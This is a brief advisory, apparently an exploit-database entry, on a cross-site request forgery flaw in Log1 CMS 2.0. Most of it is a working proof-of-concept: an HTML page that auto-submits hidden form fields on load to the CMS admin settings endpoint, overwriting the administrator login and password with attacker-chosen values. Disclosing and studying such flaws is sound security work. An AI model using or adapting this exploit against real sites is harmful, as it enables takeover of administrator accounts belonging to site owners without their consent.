Search
Software Vulnerability Tested On Date
Log1 CMS 2.0 Cross-site Request Forgery Windows Vista + XAMPP 7/5/2010
Description
A cross-site request forgery vulnerability in Log1 CMS 2.0 can be exploited to change the admin username and password.
Proof of Concept
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
            <input type="hidden" name="title" value="log1 CMS" />
            <input type="hidden" name="desc" value="log1cms official page" />
            <input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
            <input type="hidden" name="language" value="0" />
            <input type="hidden" name="bgcolor" value="#ffffff" />
            <input type="hidden" name="textcolor" value="#999999" />
            <input type="hidden" name="specialcolor" value="#000000" />
            <input type="hidden" name="login" value="admin" />
            <input type="hidden" name="pass" value="Password1" />
            <input type="hidden" name="isMd5" value="1" />
            <input type="hidden" name="google_login" value="gerard.caplain" />
            <input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
            <input type="hidden" name="copyright" value="2010 by log1" />
        </form>
    </body>
</html>